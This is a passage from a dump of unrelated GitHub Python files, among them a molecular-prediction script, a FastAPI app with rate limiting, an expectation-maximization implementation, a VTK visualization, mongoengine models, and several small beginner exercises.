gmrandazzo@gmail.com\n# This file is part of DeepMolecularNetwork.\n# You can use,modify, and distribute it under\n# the terms of the GNU General Public Licenze, version 3.\n# See the file LICENSE for details\n\nfrom SMILES2Matrix import SMILES2MX\nimport argparse\n# from keras.callbacks import Callback, EarlyStopping, TensorBoard\n# from miscfun import exp_pred_plot\nimport numpy as np\nimport sys\n# from sklearn.model_selection import RepeatedKFold\n# from tensorflow import set_random_seed\nimport os\nimport tensorflow as tf\nif int(tf.__version__[0]) > 1:\n from tensorflow.keras import backend as K\nelse:\n from keras import backend as K\n# Some memory clean-up\nK.clear_session()\n\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\nsys.path.append(\"%s/../Base\" % (dir_path))\nfrom dmnnio import ReadDescriptors\nfrom modelhelpers import LoadKerasModels\n\nclass ModelPredictor(object):\n def __init__(self, mpath, smiles, csv_descriptors=None):\n self.mpath = mpath\n self.X, self.input_shape = self.ReadSMILES(smiles)\n if csv_descriptors is not None:\n self.desc, self.nfeatures, self.header = ReadDescriptors(csv_descriptors)\n else:\n self.desc = None\n self.nfeatures = 0\n self.header = None\n\n self.keys = None\n if self.nfeatures > 0:\n self.keys = []\n all_keys_ = None\n if len(self.X.keys()) > 
len(self.desc.keys()):\n                all_keys_ = self.X.keys()\n            else:\n                all_keys_ = self.desc.keys()\n            for key in all_keys_:\n                if key in self.X.keys() and key in self.desc.keys():\n                    self.keys.append(key)\n                else:\n                    continue\n        else:\n            self.keys = list(self.X.keys())\n        self.dmap = None\n        if self.nfeatures > 0:\n            # check that all the descriptors\n            # are present in the previously loaded desc\n            # FIXME: self.odesc (the training-time descriptor names) is never\n            # assigned in this class before it is used here\n            nf = []\n            self.dmap = {}\n            for i in range(len(self.odesc)):\n                if self.odesc[i] in self.header:\n                    self.dmap[self.odesc[i]] = i\n                else:\n                    nf.append(self.odesc[i])\n            if len(nf) > 0:\n                print(\"Error! Missing some descriptors\")\n                print(nf)\n                exit()\n        return\n\n    def ReadSMILES(self, smiles_list):\n        s2m = SMILES2MX(512)\n        f = open(smiles_list, \"r\")\n        X = {}\n        for line in f:\n            v = str.split(line.strip(), \"\\t\")\n            print(\"Parsing: %s\" % (v[1]))\n            X[v[1]] = np.array(s2m.smi2mx(v[0]))\n        f.close()\n        return X, s2m.getshape()\n\n    def GenData(self):\n        batch_features = np.array([]).reshape(0, self.nfeatures)\n        for key in self.desc.keys():\n            x = [0 for i in range(self.nfeatures)]\n            for i in range(len(self.desc[key])):\n                p = self.dmap[self.header[i]]\n                x[p] = self.desc[key][i]\n            # align column header\n            batch_features = np.vstack([batch_features, x])\n        return batch_features\n\n    def predict(self, pout):\n        \n        predictions = {}\n        for key in self.keys:\n            predictions[key] = []\n\n        x_topred = self.GenData()\n        for model in LoadKerasModels(self.mpath):\n            y_pred = list(model.predict(x_topred))\n            # Store the prediction results based on the input generation\n            for i in range(len(y_pred)):\n                predictions[self.keys[i]].append(y_pred[i])\n\n        fo = open(pout, \"w\")\n        for key in predictions.keys():\n            print(\"Store %s\" % (key))\n            if len(predictions[key]) > 0:\n                ypavg = np.mean(predictions[key])\n                ystdev = np.std(predictions[key])\n                y_min = np.min(predictions[key])\n                y_max = np.max(predictions[key])\n                fo.write(\"%s,%.4f,%.4f,%.4f,%.4f\\n\" % (key,\n                                                        ypavg,\n                                                        ystdev,\n                                                        y_min,\n                                                        y_max))\n            else:\n                continue\n        fo.close()\n        fo = open(\"all_y_%s\" % (pout), \"w\")\n        for key in predictions.keys():\n            fo.write(\"%s,\" % (key))\n            for i in range(len(predictions[key])-1):\n                fo.write(\"%.4f,\" % (predictions[key][i]))\n            fo.write(\"%.4f\\n\" % (predictions[key][-1]))\n        fo.close()\n\n\ndef main():\n    p = argparse.ArgumentParser()\n    p.add_argument('--smiles',\n                   default=None,\n                   type=str,\n                   help='Smiles molecules')\n    p.add_argument('--desc_csv',\n                   default=None,\n                   type=str,\n                   help='Molecule descriptors')\n    p.add_argument('--minp',\n                   default=None,\n                   type=str,\n                   help='model input')\n    p.add_argument('--pout',\n                   default=None,\n                   type=str,\n                   help='Prediction output')\n    args = p.parse_args(sys.argv[1:])\n\n    if args.pout is None or args.smiles is None or args.minp is None:\n        print(\"\\nUsage:\")\n        print(\"--smiles [Smiles molecules]\")\n        print(\"--desc_csv [Molecular descriptors file]\")\n        print(\"--minp [keras model out]\")\n        print(\"--pout [default None]\")\n        print(\"\\nUsage model prediction example: python %s --smiles dataset.smi --desc_csv rdkit.desc.csv --minp model --pout output.csv\\n\" % (sys.argv[0]))\n    else:\n        mp = ModelPredictor(args.minp,\n                            args.smiles,\n                            args.desc_csv)\n        mp.predict(args.pout)\n    return 0\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"gmrandazzo/DeepMolecularNetwork","sub_path":"deepmolecularnetwork/OneHotEncodingModeling/makeOHEPrediction.py","file_name":"makeOHEPrediction.py","file_ext":"py","file_size_in_byte":5869,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"14022830600","text":"from 
model_mommy import mommy\nfrom rest_framework.reverse import reverse\nfrom rest_framework.test import APITestCase\n\n\nclass AppFilterTest(APITestCase):\n\n def setUp(self):\n self.superuser = mommy.make(\n \"api.User\", is_superuser=True)\n self.normal_user = mommy.make(\n \"api.User\", is_superuser=False)\n\n self.app_1 = mommy.make(\n \"api.App\", name=\"App 1\")\n self.app_2 = mommy.make(\n \"api.App\", name=\"App 2\")\n\n def test_everyone_see_everything(self):\n for user in [self.superuser, self.normal_user]:\n self.client.force_login(user)\n\n response = self.client.get(reverse(\"app-list\"))\n app_ids = [app[\"id\"] for app in response.data[\"results\"]]\n self.assertEqual(len(app_ids), 2)\n self.assertIn(self.app_1.id, app_ids)\n self.assertIn(self.app_2.id, app_ids)\n","repo_name":"lahkurb/analytics-platform-control-panel","sub_path":"tests/api/filters/test_app_filter.py","file_name":"test_app_filter.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23234905076","text":"import sys\nimport yaml\nfrom PyQt5 import QtWidgets, QtCore, QtGui\n\nclass MainWindow(object):\n def setup_ui(self, form):\n form.setObjectName(\"Main Window\")\n form.resize(752, 568)\n self.widget = QtWidgets.QWidget(form)\n\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n form = QtWidgets.QWidget()\n ui = MainWindow()\n ui.setup_ui(form)\n form.show()\n sys.exit(app.exec_())","repo_name":"refrshrs/CharGen","sub_path":"_archive/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11079922008","text":"try:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n\nconfig = {\n 'description': 'Kleines MauMau-Spiel',\n 'author': 'Frederik',\n 'url': '',\n 'download_url': '',\n 'author_email': 'code@padjen.de',\n 'version': '0.0.1',\n 'install_requires': ['nose'],\n 'packages': ['maumau'],\n 'scripts': [],\n 'name': 'maumau'\n}\n\nsetup(**config)\n","repo_name":"fpadjen/MauMau","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"29689398675","text":"from setuptools import setup, find_packages\nimport re\n\n\nversion = ''\nwith open('aioEasyPillow/__init__.py') as f:\n version = re.search(r'^__version__\\s*=\\s*[\\'\"]([^\\'\"]*)[\\'\"]', f.read(), re.MULTILINE).group(1)\n\nreadme = ''\nwith open('README.md') as f:\n readme = f.read()\n\nrequirements = []\nwith open(\"requirements.txt\") as f:\n requirements = f.read().splitlines()\n\n\nsetup(\n name='aioEasyPillow',\n version=version,\n description='Async working easy to use Pillow Library.',\n long_description=readme,\n long_description_content_type=\"text/markdown\",\n author='Guddi',\n url='https://github.com/Guddi8/aioEasyPillow',\n project_urls={\n \"Documentation\": \"https://aioeasypillow.readthedocs.io/en/latest/\",\n },\n packages=find_packages(),\n license='MIT',\n keywords=[\n 'PIL', 'Pillow', 'async PIL', 'async Pillow', 'Easy PIL', 'Easy Pillow',\n 'discord images', 'discord card', 'discord rank card'\n ],\n install_requires=requirements,\n python_requires=\">=3.8, <4\",\n include_package_data=True,\n package_data={\n \"aioEasyPillow\": [\"fonts/*/*.ttf\"],\n 
},\n)","repo_name":"Guddi8/aioEasyPillow","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"42870904305","text":"def verifica_lista(l):\n im = True\n p = True\n if len(l) == 0:\n return 'misturado'\n for i in range(len(l)):\n if l[i]%2 != 0:\n p = False \n elif l[i]%2 == 0:\n im = False\n if im and not p:\n return 'ímpar'\n elif p and not im:\n return 'par'\n else:\n return 'misturado' \n","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_267/ch162_2020_06_12_21_22_41_582853.py","file_name":"ch162_2020_06_12_21_22_41_582853.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10387319643","text":"import skimage.io as io\nimport skimage.util.noise as noise\nimport scipy.ndimage as ndi\nimport matplotlib.pyplot as plt\nfrom scipy.signal import wiener\n\nimg01= io.imread('C://Users//kamel//Music//misc//4.2.07.tiff')\n\nplt.subplot(2,2,1)\nplt.title('Original')\nio.imshow(img01)\n\nimg02= noise.random_noise(img01,'gaussian',mean=0,var=0.01)\n\nplt.subplot(2,2,2)\nplt.title('Noisy')\nio.imshow(img02)\n\nimg03= ndi.uniform_filter(img02,2)\nplt.subplot(2,2,3)\nplt.title('Average filtered')\nio.imshow(img03)\n\nimg03= wiener(img02,[3,3,3])\nplt.subplot(2,2,4)\nplt.title('Wiener filtered')\nio.imshow(img03)\n\nplt.show()\n","repo_name":"KameliaZaman/DIP-Lab","sub_path":"RnD/Alasdair/task13.10.py","file_name":"task13.10.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"497717738","text":"from __future__ import annotations\n\nfrom typing import TYPE_CHECKING\n\nimport numpy as np\nimport pandas as pd\nfrom copy import deepcopy\nfrom scipy.special import rel_entr as kl\nfrom multiprocessing import Pool, cpu_count\n\nfrom .junction_tree import junction_tree\nfrom .nodes import parents as _parents\nfrom ..structures import DirectedGraph, BayesianNetwork, ConditionalProbabilityTable\n\nif TYPE_CHECKING:\n from typing import Dict, List\n from ..structures import Dataset\n\n\ndef expectation_maximization(\n dag: DirectedGraph,\n dataset: Dataset,\n max_iter: int = 50,\n tol: float = 1e-08\n) -> BayesianNetwork:\n # If DAG is string, build BayesianNetwork\n if isinstance(dag, str):\n dag = BayesianNetwork.from_structure(dag)\n if isinstance(dag, DirectedGraph):\n dag = BayesianNetwork(\n nodes=dag.nodes(),\n adjacency_matrix=dag.adjacency_matrix()\n )\n # Get nodes from dag\n nodes = dag.nodes()\n # Get variables levels from dataset\n levels = dataset.levels()\n # Cache parents for each node\n parents = {\n node: _parents(dag, node)\n for node in nodes\n }\n # Create zeroed CPTs for each variable\n zeros = _build_empty_cpts(nodes, levels, parents)\n # Initialize CPTs of each node\n # using a uniform distribution\n for node in nodes:\n dag[node]['CPT'] = zeros[node] + (1 / len(levels[node]))\n # Count absolute frequencies of unique\n # variables configurations in dataset\n # and transform in list of dicts by row\n dataset = dataset.absolute_frequencies()\n dataset = dataset.reset_index().to_dict('records')\n # Repeat until convergence or max iterations reached\n iteration = 0\n converged = False\n while not converged and iteration < max_iter:\n ### Expectation Step ###\n\n # Compute the Junction Tree for exact inference\n jt = 
junction_tree(dag)\n # Initialize list of parameters\n frequencies = [\n (node, parents[node], dataset, zeros[node].copy(), jt)\n for node in nodes\n ]\n # For each node, for each row compute absolute\n # frequencies counting from dataset and using\n # joint queries when NAN values are present\n pool = Pool(cpu_count())\n frequencies = pool.starmap(_expectation_maximization_node, frequencies)\n pool.close()\n pool.join()\n\n ### Maximization Step ###\n\n # For each node compute CPT\n frequencies = {\n nodes[i]: freq / freq.sum(axis=0)\n for i, freq in enumerate(frequencies)\n }\n\n ### Check stopping criteria ###\n converged = _has_converged(dag, frequencies, tol)\n iteration += 1\n\n # Update CPT in DAG\n dag.set_cpts(frequencies)\n return dag\n\n\ndef _expectation_maximization_node(node, parents, dataset, counter, jt):\n for row in dataset:\n # Init query\n query = 1\n # Select variables\n variables = [node] + parents\n # Select variables values\n values = {\n k: v for k, v in row.items()\n if k in variables\n }\n # Check if there are NAN values\n any_nan = any([pd.isnull(v) for _, v in values.items()])\n if (any_nan):\n # Set evidence\n evidence = _build_evidence(row, variables)\n jte = jt.set_evidence(**evidence)\n # Execute query\n query = jte.query('joint', variables)[0]\n # Update values\n counter.loc[values] += query * row['count']\n return counter\n\n\ndef _build_empty_cpts(nodes: List, levels: Dict, parents: Dict):\n cpts = {}\n for node in nodes:\n dim = [node] + parents[node]\n lvs = [levels[d] for d in dim]\n dat = np.zeros([len(l) for l in lvs])\n cpts[node] = ConditionalProbabilityTable(\n data=dat,\n dims=dim,\n coords=lvs\n )\n return cpts\n\n\ndef _build_evidence(row: Dict, variables: List):\n return {\n k: v for k, v in row.items()\n if k not in variables\n and k != 'count'\n and not pd.isnull(v)\n }\n\n\ndef _has_converged(dag: BayesianNetwork, frequencies: Dict, tol: float):\n return all([\n np.sum(kl(dag[node]['CPT'].values, cpt.values)) < tol\n for node, cpt in frequencies.items()\n ])\n","repo_name":"madlabunimib/MADBayes","sub_path":"madbayes/algorithms/expectation_maximization.py","file_name":"expectation_maximization.py","file_ext":"py","file_size_in_byte":4320,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"25308601778","text":"#!/bin/env python3\nimport numpy as np\nimport pandas as pd\nfrom collections import defaultdict, Counter\n\nimport vtk\n# each color to specific square\nfrom vtk.util.colors import red, orange, yellow\nfrom vtk.util.colors import purple, blue, green\nfrom vtk.util.colors import white, magenta, green_dark\nfrom vtk.util.colors import grey, light_grey, pink\n\ndf = pd.read_csv(\"../data/fingerprinting.csv\", index_col=\"Unnamed: 0\")\nf = df.Square.apply(lambda x: int(x[1:]))\n\nfunc = defaultdict(list)\nfor i, val in zip(df[[\"Server-RSSI-1\", \"Server-RSSI-2\", \"Server-RSSI-3\"]].to_numpy(), f):\n func[tuple(i)].append(val)\n\nunique_func = dict()\nfor i, val in func.items():\n unique_func[i] = max(Counter(val).items(), key=lambda x: x[1])[0]\n\n# create bins for space\n# [-95; -20] - range, that RSSI can be measured\nnx = ny = nz = 75\nnumPoints = nx * ny * nz\n\nmn_x = df[\"Server-RSSI-1\"].min()\nmx_x = df[\"Server-RSSI-1\"].max()\nxs = np.linspace(-20, -95, nx)\n\nmn_y = df[\"Server-RSSI-2\"].min()\nmx_y = df[\"Server-RSSI-2\"].max()\nys = np.linspace(-20, -95, nx)\n\nmn_z = df[\"Server-RSSI-3\"].min()\nmx_z = df[\"Server-RSSI-3\"].max()\nzs = np.linspace(-20, -95, 
nz)\nzz, yy, xx = np.meshgrid(zs, ys, xs, indexing='ij')\nxyz = np.zeros((numPoints, 3), np.float64)\nxyz[:, 0] = xx.flat\nxyz[:, 1] = yy.flat\nxyz[:, 2] = zz.flat\n\n# create the pipeline\ncoords = vtk.vtkDoubleArray()\npts = vtk.vtkPoints()\ngrid = vtk.vtkStructuredGrid()\nitems = vtk.vtkAppendPolyData()\nmapper = vtk.vtkPolyDataMapper()\nactor = vtk.vtkActor()\ndomainMapper = vtk.vtkDataSetMapper()\ndomainActor = vtk.vtkActor()\n\n\n# colors\ndef get_color(r, g, b):\n clrs = vtk.vtkUnsignedCharArray()\n clrs.SetNumberOfComponents(3)\n clrs.SetName(\"Colors\")\n clrs.SetNumberOfTuples(0)\n for i in range(1024):\n clrs.InsertNextTypedTuple((r, g, b))\n return clrs\n\n\ncolors = [[int(gr * 255) for gr in c] for c in\n [red, orange, yellow, purple, blue, green, white, magenta, green_dark, grey, light_grey, pink]]\n\n# make each point a sphere with small radius\nfor i, val in unique_func.items():\n dotSource = vtk.vtkSphereSource()\n dotSource.SetThetaResolution(5)\n dotSource.SetPhiResolution(5)\n dotSource.SetRadius(0.3)\n dotSource.SetCenter(*i)\n\n sp = dotSource.GetOutput()\n dotSource.Update()\n sp.GetCellData().SetScalars(get_color(*colors[val]))\n\n items.AddInputConnection(dotSource.GetOutputPort())\n\n# settings\ndomainMapper.SetScalarVisibility(0)\ndomainActor.GetProperty().SetOpacity(0.3)\n\n# construct the grid\ngrid.SetDimensions(nx, ny, nz)\ncoords.SetNumberOfComponents(3)\ncoords.SetNumberOfTuples(numPoints)\ncoords.SetVoidArray(xyz, 3 * numPoints, 1)\n\n# connect\npts.SetNumberOfPoints(numPoints)\npts.SetData(coords)\ngrid.SetPoints(pts)\nmapper.SetInputConnection(items.GetOutputPort())\nmapper.SetColorModeToDirectScalars()\nactor.SetMapper(mapper)\ndomainMapper.SetInputData(grid)\ndomainActor.SetMapper(domainMapper)\n\n# show\nren = vtk.vtkRenderer()\nrenWin = vtk.vtkRenderWindow()\nrenWin.AddRenderer(ren)\niren = vtk.vtkRenderWindowInteractor()\niren.SetRenderWindow(renWin)\n\n# add the actors to the renderer, set the background and size\nren.AddActor(actor)\nren.AddActor(domainActor)\nren.SetBackground(0.0, 0.0, 0.0)\nren.SetUseDepthPeeling(1)\nren.SetOcclusionRatio(0.1)\nren.SetMaximumNumberOfPeels(100)\nrenWin.SetSize(400, 300)\nrenWin.SetMultiSamples(0)\nrenWin.SetAlphaBitPlanes(1)\niren.Initialize()\nrenWin.Render()\niren.Start()\n","repo_name":"Midren/Localization","sub_path":"scripts/fingerprinting_visualization.py","file_name":"fingerprinting_visualization.py","file_ext":"py","file_size_in_byte":3402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24417778603","text":"from app import app\r\nfrom modelos import *\r\nfrom flask import render_template\r\n\r\n@app.route('/')\r\ndef login():\r\n form = LoginForm()\r\n return render_template('index.html', title='Sign In', form=form)\r\n\r\n\r\n\r\n\r\n@app.route('/consulta')\r\ndef index():\r\n #listas\r\n personas=Personas.query.order_by(Personas.ID).all()\r\n print(personas)\r\n return render_template('Consulta.html', persona=personas)\r\n","repo_name":"Sot0823/Proyecto-Flask-DB2","sub_path":"controlador.py","file_name":"controlador.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71572582452","text":"#find odd frequency charecters in string\r\n# it smells like count() method, counter( ) method\r\n\r\n\r\n#attempt 1\r\n#try with count()method\r\n# i think its simple make the given string a set then pair a loop and count() with it\r\n\r\ntest_str=\"geeks 
for geeks \"\r\nx=set(test_str)\r\nres=[]\r\nfor i in x:\r\n    if test_str.count(i)%2!=0:\r\n        res.append(i)\r\nprint(\"the odd frequency charecters are:\",res)\r\n\r\n\r\n#attempt 2\r\n#try with list comprehension() + Counter()\r\n#look closely\r\nfrom collections import Counter\r\ntest_str='geeksforgeeks is best for geeks '\r\nprint(\"the original string is :\", test_str)\r\nres=[ chr for chr ,count in Counter(test_str).items() if count & 1]\r\nprint(\"the odd frequency charecters are :\",str(res))\r\n\r\n\r\n\r\n    ","repo_name":"hackerbotsupreme/python-coding-job","sub_path":"string/problem11.py","file_name":"problem11.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3500139710","text":"#!/usr/bin/env python3\n\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nimport numpy as np\n\ndef abline(slope, intercept):\n    x = np.array(plt.gca().get_xlim())\n    y = slope * x + intercept\n    plt.plot(x, y, '--')\n\ndef plot_points(data, inliers):\n    categories = data[:, 2].astype(np.uint8)\n    unique_cats = np.unique(categories)\n    for c in unique_cats:\n        plt.scatter(data[categories == c, 0], data[categories == c, 1], label=\"noise\" if c == 0 else \"linear\")\n\ndef show(csv_path: str, slope: float, intercept: float, error: float):\n    data = np.loadtxt(csv_path, delimiter=\",\")\n    inliers = np.loadtxt(\"inliers.txt\", dtype=int)\n\n    # only use a subset for plotting\n    max_datapoints = 1000\n    if len(data) > max_datapoints:\n        data = data[::(len(data) // max_datapoints)]\n\n    plot_points(data, inliers)\n    abline(slope, intercept)\n    plt.title(f\"Slope: {slope:.4}, Intercept: {intercept:.4}, Error: {error:.4}\")\n    plt.legend()\n    # save before show(): show() clears the current figure\n    plt.savefig(\"vis.jpg\")\n    plt.show()\n\nif __name__ == \"__main__\":\n    with open(\"results.txt\", \"r\") as f:\n        model = [float(s) for s in f.readline().split(\" \")]\n    show(\"points.csv\", *model)\n","repo_name":"cyd3r/ransac","sub_path":"util/vis.py","file_name":"vis.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"285054317","text":"#\r\n# print(\"Let's find whether the number is Armstrong number or not. 
\\n\\n\\n\")\r\n# print(\"\\n Enter the number\")\r\n# num = int(input())\r\n# num = str(num)\r\n# num_ls = list(num)\r\n# count = len(num_ls)\r\n# sum = 0\r\n# for i in range(count):\r\n# sum += pow(int(num_ls[i]),count)\r\n# print(sum)\r\n# if sum == int(num):\r\n# print(\"\\n The entered number is Armstrong\")\r\n\r\nprint(\"\\n********************************************************************\\n\")\r\nprint(\"\\n Lets display armstrong numbers from the given range\")\r\nfirst = int(input(\"\\n Enter the first number for the range : \"))\r\nlast = int(input(\"\\n Enter the last number for the range : \"))\r\nprint(\"\\n Below are Armstrong numbers between \",first, \" and \",last)\r\nfor i in range(first,last+1):\r\n num = str(i)\r\n num_l = list(num)\r\n count = len(num_l)\r\n sum = 0\r\n for j in range(count):\r\n sum += pow(int(num_l[j]),count)\r\n if sum == int(num):\r\n print(sum)\r\n print(\"\")","repo_name":"Rahul26795/Python-Programs-1","sub_path":"Amstrong_num.py","file_name":"Amstrong_num.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41006707497","text":"# -*- coding:utf-8 -*-\n\n\n# 2進数、8進数、10進数の回文数を求める処理\ndef main():\n # 11から探索開始\n x = 11\n\n while True:\n # 型もチェックするので、合わせる\n # format()はint型でないとエラーになる\n # format(b)はbinary(2進数)、format(o)はoctal(8進数)\n # str()にしたあとに[::-1]をすると文字列が逆に並ぶ(すごい)\n if str(x) == str(x)[::-1] \\\n and str(format(x, 'b')) == str(format(x, 'b'))[::-1] \\\n and str(format(x, 'o')) == str(format(x, 'o'))[::-1]:\n print(x)\n break\n\n # python3からこの表記はおkになった?\n x += 2\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"aipacommander/q-programming-math","sub_path":"q01.py","file_name":"q01.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13443921085","text":"import logging.config\nimport os\nimport re\nfrom http import HTTPStatus\nfrom pathlib import Path\n\nfrom fastapi import FastAPI, Request\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom fastapi.responses import JSONResponse\nfrom fastapi.staticfiles import StaticFiles\nfrom fastapi_utils.openapi import simplify_operation_ids\nfrom starlette.responses import FileResponse, RedirectResponse\n\nfrom app.api.api_v1.api import router\nfrom app.core.config import get_settings\nfrom app.core.redis_client import redis\nfrom app.data.cache import cached_data\nfrom app.docs.api_docs.swagger_ui import get_api_docs_for_swagger_ui, get_swagger_ui_html\n\nAPP_FOLDER = Path(__file__).parent\nSTATIC_FOLDER = APP_FOLDER.joinpath(\"static\")\nRATE_LIMIT_ROUTE_REGEX = re.compile(r\"^\\/v1\\/blocks|characters|planes\")\n\n\napp = FastAPI(\n title=get_settings().PROJECT_NAME,\n description=get_api_docs_for_swagger_ui(),\n version=get_settings().API_VERSION,\n openapi_url=f\"{get_settings().API_VERSION}/openapi.json\",\n docs_url=None,\n redoc_url=None,\n)\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\n \"http://localhost:3500\",\n \"http://10.0.1.74:3500\",\n \"https://base64.aaronluna.dev\",\n \"http://172.17.0.1\",\n ],\n allow_credentials=True,\n allow_methods=[\"GET\", \"OPTIONS\"],\n allow_headers=[\"X-UnicodeAPI-Test\"],\n)\napp.mount(\"/static\", StaticFiles(directory=str(STATIC_FOLDER)), name=\"static\")\n\n\n@app.on_event(\"startup\")\ndef init_unicode_obj():\n _ = cached_data.non_unihan_character_name_map\n _ = cached_data.blocks\n _ = cached_data.planes\n _ = 
cached_data.all_unicode_versions\n\n\n@app.on_event(\"startup\")\ndef init_redis_client():\n    settings = get_settings()\n    logging.config.dictConfig(settings.LOGGING_CONFIG)\n    _ = redis.get_redis_client()\n\n\n@app.middleware(\"http\")\nasync def apply_rate_limiting(request: Request, call_next):\n    if testing(request) or not RATE_LIMIT_ROUTE_REGEX.search(request.url.path) or not request.client:\n        return await call_next(request)\n    result = redis.is_request_allowed_by_rate_limit(request.client.host)\n    if result.success:\n        return await call_next(request)\n    return JSONResponse(content=result.error, status_code=int(HTTPStatus.TOO_MANY_REQUESTS))\n\n\ndef testing(request: Request) -> bool:\n    test_header = os.environ.get(\"TEST_HEADER\", \"\").lower()\n    return (\n        test_header in request.headers or test_header in request.headers.get(\"access-control-request-headers\", [])\n        if test_header\n        else False\n    )\n\n\n@app.get(f\"{get_settings().API_VERSION}/docs\", include_in_schema=False, response_class=FileResponse)\nasync def swagger_ui_html():\n    settings = get_settings()\n    return get_swagger_ui_html(\n        openapi_url=app.openapi_url or \"/openapi.json\",\n        title=f\"{settings.PROJECT_NAME} Docs - Swagger UI\",\n        swagger_js_url=\"/static/swagger-ui-bundle.js\",\n        swagger_css_url=\"/static/swagger-ui.css\",\n        swagger_favicon_url=\"/static/favicon.png\",\n        swagger_ui_parameters={\n            \"docExpansion\": \"list\",\n            \"defaultModelsExpandDepth\": -1,\n            \"useUnsafeMarkdown\": True,\n            \"syntaxHighlight.theme\": \"arta\",\n            \"tryItOutEnabled\": \"true\",\n            \"displayRequestDuration\": \"true\",\n            \"requestSnippetsEnabled\": \"true\",\n            \"requestSnippets\": {\n                \"generators\": {\n                    \"curl_bash\": {\"title\": \"cURL (bash)\", \"syntax\": \"bash\"},\n                },\n                \"defaultExpanded\": False,\n                \"languages\": None,\n            },\n        },\n        custom_js_url=\"/static/custom.js\",\n    )\n\n\n@app.get(\"/\", include_in_schema=False)\ndef get_api_root():\n    return RedirectResponse(\n        url=app.url_path_for(\"swagger_ui_html\"),\n        status_code=int(HTTPStatus.PERMANENT_REDIRECT),\n    )\n\n\napp.include_router(router, prefix=get_settings().API_VERSION)\nsimplify_operation_ids(app)\n","repo_name":"a-luna/unicode-api","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3929,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"2953335347","text":"from typing import Type\nfrom fastapi.datastructures import Default\nfrom mongoengine import *\nimport datetime\n\nfrom mongoengine.document import Document, EmbeddedDocument\nfrom mongoengine.fields import *\n# from mongoengine import connect, Document, ReferenceField, CASCADEs\n\nclass Module(Document):\n    \n    ServiceId = StringField()\n    ParentContainerId = ListField(StringField())\n    UsecaseParameter = DictField(default = None)\n    ScheduleRuntime = StringField()\n    # Pass the callable itself (not utcnow()) so the default is evaluated\n    # when each document is created, not once at import time.\n    TSCreated = DateTimeField(default=datetime.datetime.utcnow)\n    TSModified = DateTimeField()\n\nclass ModuleMapping(EmbeddedDocument):\n    ScheduledModules = ListField(ReferenceField(Module))\n    UncheduledModules = ListField(ReferenceField(Module))\n\nclass Camera(Document):\n    CameraId = StringField()\n    CameraName = StringField()\n    Location = StringField()\n    Username = StringField()\n    Password = StringField()\n    Link = StringField()\n    CameraSource = StringField()\n    CameraStatus = BooleanField()\n    AddedBy = StringField(default=None)\n    RefImage = ListField()\n    Modules = EmbeddedDocumentField(ModuleMapping)\n    TSCreated = DateTimeField(default=datetime.datetime.utcnow)\n    TSModified = 
DateTimeField()\n\n\nclass ScheduleFlag(Document):\n    Status = StringField()\n\nclass CameraSource(Document):\n    SourceName = StringField()\n\nclass CameraHealthCheck(Document):\n    HealthCheck = BooleanField()\n    HealthCheckInterval = IntField()\n    GetAlert = BooleanField()\n    UserConsent = BooleanField()\n\nclass Taskmeta(Document):\n    TaskName = StringField()\n    TaskTime = DateTimeField()\n    Status = StringField()\n    Traceback = StringField()\n\nclass ServiceSchedule(Document):\n    ScheduleUsecases = ListField()\n    SchedulesAIModels = ListField()\n    UnscheduleUsecases = ListField()\n    UnscheduleAIModels = ListField()\n\nclass ServiceCameraMapping(Document):\n    ServiceId = StringField()\n    ScheduleCameraIds = ListField()\n    UnscheduleCameraIds = ListField() \n\nclass ScheduleRunTime(Document):\n    OpenTime = StringField()\n    CloseTime = StringField()\n    HolidaysList = ListField(DateTimeField())\n\nclass ReferenceImage(Document):\n    CameraId = ReferenceField(Camera)\n    ImageType = StringField()\n    TSCreated = DateTimeField()\n    TSModified = DateTimeField()\n\n\n\n\n\n\n\n\n\n","repo_name":"shrush09/RDXCamServices","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} 